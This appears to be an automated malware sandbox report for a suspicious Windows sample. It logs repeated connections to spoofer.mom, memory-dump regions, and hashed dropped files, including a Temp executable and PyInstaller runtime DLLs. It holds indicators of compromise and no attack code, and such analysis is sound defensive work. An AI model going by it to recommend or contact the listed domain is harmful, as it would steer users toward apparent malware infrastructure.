US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49927 tcp
N/A 127.0.0.1:49929 tcp
N/A 127.0.0.1:49932 tcp
N/A 127.0.0.1:49934 tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:49937 tcp
N/A 127.0.0.1:49939 tcp
US 104.21.73.244:443 spoofer.mom tcp
NL 52.111.243.30:443 tcp
N/A 127.0.0.1:57797 tcp
N/A 127.0.0.1:57799 tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57802 tcp
N/A 127.0.0.1:57804 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57807 tcp
N/A 127.0.0.1:57809 tcp
N/A 127.0.0.1:57812 tcp
N/A 127.0.0.1:57814 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
N/A 127.0.0.1:57818 tcp
N/A 127.0.0.1:57820 tcp
N/A 127.0.0.1:57824 tcp
N/A 127.0.0.1:57826 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57830 tcp
N/A 127.0.0.1:57832 tcp
N/A 127.0.0.1:57835 tcp
N/A 127.0.0.1:57837 tcp
N/A 127.0.0.1:57840 tcp
N/A 127.0.0.1:57842 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57846 tcp
N/A 127.0.0.1:57848 tcp
N/A 127.0.0.1:57851 tcp
N/A 127.0.0.1:57853 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57856 tcp
N/A 127.0.0.1:57858 tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57861 tcp
N/A 127.0.0.1:57863 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57866 tcp
N/A 127.0.0.1:57868 tcp
N/A 127.0.0.1:57872 tcp
N/A 127.0.0.1:57874 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57877 tcp
N/A 127.0.0.1:57879 tcp
N/A 127.0.0.1:57882 tcp
N/A 127.0.0.1:57884 tcp
N/A 127.0.0.1:57887 tcp
N/A 127.0.0.1:57889 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57893 tcp
N/A 127.0.0.1:57895 tcp
N/A 127.0.0.1:57898 tcp
N/A 127.0.0.1:57900 tcp
N/A 127.0.0.1:57903 tcp
N/A 127.0.0.1:57905 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57910 tcp
N/A 127.0.0.1:57912 tcp
N/A 127.0.0.1:57915 tcp
N/A 127.0.0.1:57917 tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57921 tcp
N/A 127.0.0.1:57923 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57926 tcp
N/A 127.0.0.1:57928 tcp
N/A 127.0.0.1:57931 tcp
N/A 127.0.0.1:57933 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57936 tcp
N/A 127.0.0.1:57938 tcp
N/A 127.0.0.1:57942 tcp
N/A 127.0.0.1:57944 tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57947 tcp
N/A 127.0.0.1:57949 tcp
N/A 127.0.0.1:57952 tcp
N/A 127.0.0.1:57954 tcp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 104.21.73.244:443 spoofer.mom tcp
US 104.21.73.244:443 spoofer.mom tcp
N/A 127.0.0.1:57958 tcp
N/A 127.0.0.1:57960 tcp
N/A 127.0.0.1:57963 tcp
N/A 127.0.0.1:57965 tcp
N/A 127.0.0.1:57968 tcp
N/A 127.0.0.1:57970 tcp
US 104.21.73.244:443 tcp

Files

memory/116-0-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-1-0x00007FFB6EC10000-0x00007FFB6EC12000-memory.dmp

memory/116-2-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-3-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-4-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-6-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-5-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-7-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/3912-11-0x000001A446540000-0x000001A446541000-memory.dmp

memory/3912-10-0x000001A446520000-0x000001A446529000-memory.dmp

memory/116-13-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/3912-14-0x000001A446520000-0x000001A446529000-memory.dmp

memory/116-20-0x00007FFB6EC10000-0x00007FFB6EC11000-memory.dmp

memory/116-21-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-22-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-24-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-23-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-25-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-26-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-27-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-28-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-29-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-30-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-31-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-32-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-33-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-34-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-35-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-36-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-37-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-38-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-39-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-40-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-41-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-42-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-43-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-44-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-46-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-45-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-47-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-48-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-49-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-50-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-51-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-52-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-53-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-54-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-55-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-56-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-57-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-58-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-59-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-60-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-61-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-62-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-63-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-64-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b704c9ca0493bd4548ac9c69dc4a4f27
SHA1 a3e5e54e630dabe55ca18a798d9f5681e0620ba7
SHA256 2ebd5229b9dc642afba36a27c7ac12d90196b1c50985c37e94f4c17474e15411
SHA512 69c8116fb542b344a8c55e2658078bd3e0d3564b1e4c889b072dbc99d2b070dacbc4394dedbc22a4968a8cf9448e71f69ec71ded018c1bacc0e195b3b3072d32

\??\pipe\LOCAL\crashpad_60_YXNMLKCYBZRUIHJP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 477462b6ad8eaaf8d38f5e3a4daf17b0
SHA1 86174e670c44767c08a39cc2a53c09c318326201
SHA256 e6bbd4933b9baa1df4bb633319174de07db176ec215e71c8568d27c5c577184d
SHA512 a0acc2ef7fd0fcf413572eeb94d1e38aa6a682195cc03d6eaaaa0bc9e5f4b2c0033da0b835f4617aebc52069d0a10b52fc31ed53c2fe7943a480b55b7481dd4e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e7e7ae6225f422731d5fe2c6ff83ee03
SHA1 e388575ce047c814c955fca1521f271237f8790e
SHA256 c1314148b3079210dad1da78508e0c7789ed0e0e910293783d0c38aca3bc44e9
SHA512 52304c1792a053a398bb514569abac12e0e053ad7d0b6d372ca1d72547e42ffe414a0633261e22fafd4ed21532facfd9f680e6faa2a25e8b81096e3f3992dec4

C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe

MD5 b7802d686f7c65282cd7b6a45142a98b
SHA1 feb041fef423f8404d2ef046b21c506e60cac3b7
SHA256 e19f99f3434059e5fc38f3dcf1c89387309af2966b90b0a24f0fa22bdc393dcd
SHA512 463d1ce3edec83623df093f7b4a13e430cad4ecc3aaeff20d660d4a7c30929583aacba51d06706623e37b3051f8447ab644bcd45ee89c0fbb591fd1729dcc6ce

memory/116-94-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/4920-95-0x00000162F5A50000-0x00000162F5A72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i00iqxsj.itt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp

MD5 8eec510e57f5f732fd2cce73df7b73ef
SHA1 3c0af39ecb3753c5fee3b53d063c7286019eac3b
SHA256 55f7d9e99b8e2d4e0e193b2f0275501e6d9c1ebd29cadbea6a0da48a8587e3e0
SHA512 73bbf698482132b5fd60a0b58926fddec9055f8095a53bc52714e211e9340c3419736ceafd6b279667810114d306bfccdcfcddf51c0b67fe9e3c73c54583e574

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/116-131-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-166-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 185ac4ccc51958a351852deab0f57aba
SHA1 2f0711cb336afa215b2564019618c5565db83424
SHA256 71e33d314764d00c77a0df400318c84e6084617b72ce4b78fd2dd6f7f23344f2
SHA512 ba7006332a3c773818b0fb3dcf8442276d87b6b00ae895169d0d8483f22ba703efe928eb6c8a9e8307f4d31155fa81339ae35b3bf20bc29b3b884fe83613bf0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 8da3242060fc8154283b2a8feaf355de
SHA1 9a5cc0a2f547c82b29c188211c7b6798fd575b56
SHA256 d582d6b9b29cd332a4aba80b851c462853e746e4eebbe26d9f84cc320c713e5a
SHA512 8b2f19b5a84cabb988ce9a1ad2a80240594f16039d03391c230d7a9ff9ffc502ae9fc74860c360c84007aebfedc7243c4164d5a508f337bd7f7f704f057d3cba

memory/116-214-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-213-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-223-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-226-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-227-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-229-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

memory/116-228-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp

memory/116-230-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

MD5 172115efeb607a86fa7b2eb2eef1e673
SHA1 e6cc856e1fba6f09bb203fbdb587000765389f18
SHA256 ae1cc628b12f3495c50e96aca3c42a124739665a9e5ddc437cf98762d564ae9f
SHA512 59c290093adfcec817328d10ee8af92389c4953923b7b5865224cb7aef8665905d5c8b8b1cd016bb09baabf642009297495b189f69df4fe227983bb43d56a20d

C:\Users\Admin\AppData\Local\Temp\_MEI25002\ucrtbase.dll

MD5 0e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA1 4189f4459c54e69c6d3155a82524bda7549a75a6
SHA256 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512 a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

C:\Users\Admin\AppData\Local\Temp\_MEI25002\python312.dll

MD5 550288a078dffc3430c08da888e70810
SHA1 01b1d31f37fb3fd81d893cc5e4a258e976f5884f
SHA256 789a42ac160cef98f8925cb347473eeeb4e70f5513242e7faba5139ba06edf2d
SHA512 7244432fc3716f7ef27630d4e8fbc8180a2542aa97a01d44dca260ab43966dd8ac98b6023400b0478a4809aace1a128f1f4d6e544f2e591a5b436fd4c8a9d723

C:\Users\Admin\AppData\Local\Temp\_MEI25002\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_ctypes.pyd

MD5 2a834c3738742d45c0a06d40221cc588
SHA1 606705a593631d6767467fb38f9300d7cd04ab3e
SHA256 f20dfa748b878751ea1c4fe77a230d65212720652b99c4e5577bce461bbd9089
SHA512 924235a506ce4d635fa7c2b34e5d8e77eff73f963e58e29c6ef89db157bf7bab587678bb2120d09da70594926d82d87dbaa5d247e861e331cf591d45ea19a117

C:\Users\Admin\AppData\Local\Temp\_MEI25002\python3.dll

MD5 6271a2fe61978ca93e60588b6b63deb2
SHA1 be26455750789083865fe91e2b7a1ba1b457efb8
SHA256 a59487ea2c8723277f4579067248836b216a801c2152efb19afee4ac9785d6fb
SHA512 8c32bcb500a94ff47f5ef476ae65d3b677938ebee26e80350f28604aaee20b044a5d55442e94a11ccd9962f34d22610b932ac9d328197cf4d2ffbc7df640efba

C:\Users\Admin\AppData\Local\Temp\_MEI25002\_bz2.pyd

MD5 59d60a559c23202beb622021af29e8a9
SHA1 a405f23916833f1b882f37bdbba2dd799f93ea32
SHA256 706d4a0c26dd454538926cbb2ff6c64257c3d9bd48c956f7cabd6def36ffd13e
SHA512 2f60e79603cf456b2a14b8254cec75ce8be0a28d55a874d4fb23d92d63bbe781ed823ab0f4d13a23dc60c4df505cbf1dbe1a0a2049b02e4bdec8d374898002b1

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-crt-math-l1-1-0.dll

MD5 e9036fd8b4d476807a22cb2eb4485b8a
SHA1 0e49d745643f6b0a7d15ea12b6a1fe053c829b30
SHA256 bfc8ad242bf673bf9024b5bbe4158ca6a4b7bdb45760ae9d56b52965440501bd
SHA512 f1af074cce2a9c3a92e3a211223e05596506e7874ede5a06c8c580e002439d102397f2446ce12cc69c38d5143091443833820b902bb07d990654ce9d14e0a7f0

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-crt-locale-l1-1-0.dll

MD5 d8302fc8fac16f2afebf571a5ae08a71
SHA1 0c1aee698e2b282c4d19011454da90bb5ab86252
SHA256 b9ae70e8f74615ea2dc6fc74ec8371616e57c8eff8555547e7167bb2db3424f2
SHA512 cd2f4d502cd37152c4b864347fb34bc77509cc9e0e7fe0e0a77624d78cda21f244af683ea8b47453aa0fa6ead2a0b2af4816040d8ea7cdad505f470113322009

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-crt-heap-l1-1-0.dll

MD5 546da2b69f039da9da801eb7455f7ab7
SHA1 b8ff34c21862ee79d94841c40538a90953a7413b
SHA256 a93c8af790c37a9b6bac54003040c283bef560266aeec3d2de624730a161c7dc
SHA512 4a3c8055ab832eb84dd2d435f49b5b748b075bbb484248188787009012ee29dc4e04d8fd70110e546ce08d0c4457e96f4368802caee5405cff7746569039a555

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 931246f429565170bb80a1144b42a8c4
SHA1 e544fad20174cf794b51d1194fd780808f105d38
SHA256 a3ba0ee6a4abc082b730c00484d4462d16bc13ee970ee3eee96c34fc9b6ef8ed
SHA512 4d1d811a1e61a8f1798a617200f0a5ffbde9939a0c57b6b3901be9ca8445b2e50fc736f1dce410210965116249d77801940ef65d9440700a6489e1b9a8dc0a39

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-crt-environment-l1-1-0.dll

MD5 f983f25bf0ad58bcfa9f1e8fd8f94fcb
SHA1 27ede57c1a59b64db8b8c3c1b7f758deb07942e8
SHA256 a5c8c787c59d0700b5605925c8c255e5ef7902716c675ec40960640b15ff5aca
SHA512 ac797ff4f49be77803a3fe5097c006bb4806a3f69e234bf8d1440543f945360b19694c8ecf132ccfbd17b788afce816e5866154c357c27dfeb0e97c0a594c166

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-crt-convert-l1-1-0.dll

MD5 33b85a64c4af3a65c4b72c0826668500
SHA1 315ddb7a49283efe7fcae1b51ebd6db77267d8df
SHA256 8b24823407924688ecafc771edd9c58c6dbcc7de252e7ebd20751a5b9dd7abef
SHA512 b3a62cb67c7fe44ca57ac16505a9e9c3712c470130df315b591a9d39b81934209c8b48b66e1e18da4a5323785120af2d9e236f39c9b98448f88adab097bc6651

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-crt-conio-l1-1-0.dll

MD5 42ee890e5e916935a0d3b7cdee7147e0
SHA1 d354db0aac3a997b107ec151437ef17589d20ca5
SHA256 91d7a4c39baac78c595fc6cf9fd971aa0a780c297da9a8b20b37b0693bdcd42c
SHA512 4fae6d90d762ed77615d0f87833152d16b2c122964754b486ea90963930e90e83f3467253b7ed90d291a52637374952570bd9036c6b8c9eaebe8b05663ebb08e

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-util-l1-1-0.dll

MD5 427f0e19148d98012968564e4b7e622a
SHA1 488873eb98133e20acd106b39f99e3ebdfaca386
SHA256 0cbacaccedaf9b6921e6c1346de4c0b80b4607dacb0f7e306a94c2f15fa6d63d
SHA512 03fa49bdadb65b65efed5c58107912e8d1fccfa13e9adc9df4441e482d4b0edd6fa1bd8c8739ce09654b9d6a176e749a400418f01d83e7ae50fa6114d6aead2b

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-timezone-l1-1-0.dll

MD5 2554060f26e548a089cab427990aacdf
SHA1 8cc7a44a16d6b0a6b7ed444e68990ff296d712fe
SHA256 5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044
SHA512 fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 9ca65d4fe9b76374b08c4a0a12db8d2f
SHA1 a8550d6d04da33baa7d88af0b4472ba28e14e0af
SHA256 8a1e56bd740806777bc467579bdc070bcb4d1798df6a2460b9fe36f1592189b8
SHA512 19e0d2065f1ca0142b26b1f5efdd55f874f7dde7b5712dd9dfd4988a24e2fcd20d4934bdda1c2d04b95e253aa1bee7f1e7809672d7825cd741d0f6480787f3b3

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-synch-l1-2-0.dll

MD5 dd6f223b4f9b84c6e9b2a7cf49b84fc7
SHA1 2ee75d635d21d628e8083346246709a71b085710
SHA256 8356f71c5526808af2896b2d296ce14e812e4585f4d0c50d7648bc851b598bef
SHA512 9c12912daea5549a3477baa2cd05180702cf24dd185be9f1fca636db6fbd25950c8c2b83f18d093845d9283c982c0255d6402e3cdea0907590838e0acb8cc8c1

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-synch-l1-1-0.dll

MD5 6ea31229d13a2a4b723d446f4242425b
SHA1 036e888b35281e73b89da1b0807ea8e89b139791
SHA256 8eccaba9321df69182ee3fdb8fc7d0e7615ae9ad3b8ca53806ed47f4867395ae
SHA512 fa834e0e54f65d9a42ad1f4fb1086d26edfa182c069b81cff514feb13cfcb7cb5876508f1289efbc2d413b1047d20bab93ced3e5830bf4a6bb85468decd87cb6

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-string-l1-1-0.dll

MD5 84b1347e681e7c8883c3dc0069d6d6fa
SHA1 9e62148a2368724ca68dfa5d146a7b95c710c2f2
SHA256 1cb48031891b967e2f93fdd416b0324d481abde3838198e76bc2d0ca99c4fd09
SHA512 093097a49080aec187500e2a9e9c8ccd01f134a3d8dc8ab982e9981b9de400dae657222c20fb250368ecddc73b764b2f4453ab84756b908fcb16df690d3f4479

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 772f1b596a7338f8ea9ddff9aba9447d
SHA1 cda9f4b9808e9cef2aeac2ac6e7cdf0e8687c4c5
SHA256 cc1bfce8fe6f9973cca15d7dfcf339918538c629e6524f10f1931ae8e1cd63b4
SHA512 8c94890c8f0e0a8e716c777431022c2f77b69ebfaa495d541e2d3312ae1da307361d172efce94590963d17fe3fcac8599dcabe32ab56e01b4d9cf9b4f0478277

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-profile-l1-1-0.dll

MD5 9082d23943b0aa48d6af804a2f3609a2
SHA1 c11b4e12b743e260e8b3c22c9face83653d02efe
SHA256 7ecc2e3fe61f9166ff53c28d7cb172a243d94c148d3ef13545bc077748f39267
SHA512 88434a2b996ed156d5effbb7960b10401831e9b2c9421a0029d2d8fa651b9411f973e988565221894633e9ffcd6512f687afbb302efe2273d4d1282335ee361d

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-processthreads-l1-1-1.dll

MD5 4380d56a3b83ca19ea269747c9b8302b
SHA1 0c4427f6f0f367d180d37fc10ecbe6534ef6469c
SHA256 a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a
SHA512 1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-processthreads-l1-1-0.dll

MD5 8e6eb11588fa9625b68960a46a9b1391
SHA1 ff81f0b3562e846194d330fadf2ab12872be8245
SHA256 ae56e19da96204e7a9cdc0000f96a7ef15086a9fe1f686687cb2d6fbcb037cd6
SHA512 fdb97d1367852403245fc82cb1467942105e4d9db0de7cf13a73658905139bb9ae961044beb0a0870429a1e26fe00fc922fbd823bd43f30f825863cad2c22cea

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 8711e4075fa47880a2cb2bb3013b801a
SHA1 b7ceec13e3d943f26def4c8a93935315c8bb1ac3
SHA256 5bcc3a2d7d651bb1ecc41aa8cd171b5f2b634745e58a8503b702e43aee7cd8c6
SHA512 7370e4acb298b2e690ccd234bd6c95e81a5b870ae225bc0ad8fa80f4473a85e44acc6159502085fe664075afa940cff3de8363304b66a193ac970ced1ba60aae

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 eaf36a1ead954de087c5aa7ac4b4adad
SHA1 9dd6bc47e60ef90794a57c3a84967b3062f73c3c
SHA256 cdba9dc9af63ebd38301a2e7e52391343efeb54349fc2d9b4ee7b6bf4f9cf6eb
SHA512 1af9e60bf5c186ced5877a7fa690d9690b854faa7e6b87b0365521eafb7497fb7370ac023db344a6a92db2544b5bdc6e2744c03b10c286ebbf4f57c6ca3722cf

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-memory-l1-1-0.dll

MD5 c4098d0e952519161f4fd4846ec2b7fc
SHA1 8138ca7eb3015fc617620f05530e4d939cafbd77
SHA256 51b2103e0576b790d5f5fdacb42af5dac357f1fd37afbaaf4c462241c90694b4
SHA512 95aa4c7071bc3e3fa4db80742f587a0b80a452415c816003e894d2582832cf6eac645a26408145245d4deabe71f00eccf6adb38867206bedd5aa0a6413d241f5

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-localization-l1-2-0.dll

MD5 20ddf543a1abe7aee845de1ec1d3aa8e
SHA1 0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf
SHA256 d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8
SHA512 96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 8dfc224c610dd47c6ec95e80068b40c5
SHA1 178356b790759dc9908835e567edfb67420fbaac
SHA256 7b8c7e09030df8cdc899b9162452105f8baeb03ca847e552a57f7c81197762f2
SHA512 fe5be81bfce4a0442dd1901721f36b1e2efcdcee1fdd31d7612ad5676e6c5ae5e23e9a96b2789cb42b7b26e813347f0c02614937c561016f1563f0887e69bbee

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-interlocked-l1-1-0.dll

MD5 4f631924e3f102301dac36b514be7666
SHA1 b3740a0acdaf3fba60505a135b903e88acb48279
SHA256 e2406077621dce39984da779f4d436c534a31c5e863db1f65de5939d962157af
SHA512 56f9fb629675525cbe84a29d44105b9587a9359663085b62f3fbe3eea66451da829b1b6f888606bc79754b6b814ca4a1b215f04f301efe4db0d969187d6f76f1

C:\Users\Admin\AppData\Local\Temp\_MEI25002\api-ms-win-core-heap-l1-1-0.dll

MD5 6168023bdb7a9ddc69042beecadbe811
